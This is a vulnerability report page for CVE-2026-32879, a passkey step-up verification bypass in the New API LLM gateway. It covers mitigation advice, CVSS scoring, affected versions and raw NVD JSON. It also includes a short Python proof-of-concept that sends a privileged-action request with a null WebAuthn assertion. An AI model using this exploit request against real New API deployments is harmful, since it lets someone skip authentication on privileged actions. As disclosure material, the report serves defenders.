Security Vulnerability Report
CVE-2026-32879 CVSS 4.9 MEDIUM

CVE-2026-32879

Published: 2026-03-23 20:16:27
Last Modified: 2026-03-25 17:52:29

Description

New API is a large language model (LLM) gateway and artificial intelligence (AI) asset management system. Starting in version 0.10.0, a logic flaw in the universal secure verification flow allows an authenticated user with a registered passkey to satisfy secure verification without completing a WebAuthn assertion. As of the time of publication, no known patched versions are available. Until a patched release is applied, do not rely on passkeys as the step-up method for privileged secure-verification actions; require TOTP/2FA for those actions where operationally possible; or temporarily restrict access to the affected secure-verification-protected endpoints.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:newapi:new_api:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:newapi:new_api:0.11.9:alpha1:*:*:*:*:*:* - VULNERABLE
New API >= 0.10.0 and < 0.11.9 (per the CPE match range), plus the 0.11.9 alpha1 pre-release

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (Example)
target_url = "https://target-new-api.com/api/secure/action"
session_cookie = "valid_session_token_here"

headers = {
    "Cookie": f"session={session_cookie}",
    "Content-Type": "application/json",
}

# The vulnerability allows satisfying the secure check without the WebAuthn assertion.
# Exploit payload attempting to bypass the verification step.
payload = {
    "action": "privileged_operation",
    "verification_method": "passkey",
    # Normally a valid 'webauthn_assertion' is required here,
    # but due to the logic flaw, omitting it or sending an incomplete one
    # might satisfy the check if the user has a passkey registered.
    "webauthn_assertion": None,
}

try:
    response = requests.post(target_url, json=payload, headers=headers, verify=False)
    if response.status_code == 200:
        print("[+] Exploit successful! Action executed.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32879", "sourceIdentifier": "[email protected]", "published": "2026-03-23T20:16:27.373", "lastModified": "2026-03-25T17:52:28.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. Starting in version 0.10.0, a logic flaw in the universal secure verification flow allows an authenticated user with a registered passkey to satisfy secure verification without completing a WebAuthn assertion. As of time of publication, no known patched versions are available. Until a patched release is applied, do not rely on passkey as the step-up method for privileged secure-verification actions; require TOTP/2FA for those actions where operationally possible; or temporarily restrict access to affected secure-verification-protected endpoints."}, {"lang": "es", "value": "Nueva API es una pasarela de modo de lenguaje grande (LLM) y un sistema de gestión de activos de inteligencia artificial (IA). A partir de la versión 0.10.0, una falla lógica en el flujo de verificación segura universal permite a un usuario autenticado con una clave de acceso (passkey) registrada satisfacer la verificación segura sin completar una aserción WebAuthn. A la fecha de publicación, no hay versiones parcheadas conocidas disponibles. Hasta que se aplique una versión parcheada, no confíe en la clave de acceso (passkey) como método de elevación para acciones privilegiadas de verificación segura; requiera TOTP/2FA para esas acciones donde sea operacionalmente posible; o restrinja temporalmente el acceso a los puntos finales afectados protegidos por verificación segura."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:newapi:new_api:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.10.0", "versionEndExcluding": "0.11.9", "matchCriteriaId": "EF65AC0F-AAD5-448C-9518-09F014D43036"}, {"vulnerable": true, "criteria": "cpe:2.3:a:newapi:new_api:0.11.9:alpha1:*:*:*:*:*:*", "matchCriteriaId": "33AF3DD3-4364-45D6-A2EB-775B5AAB406B"}]}]}], "references": [{"url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-5353-f8fq-65vc", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}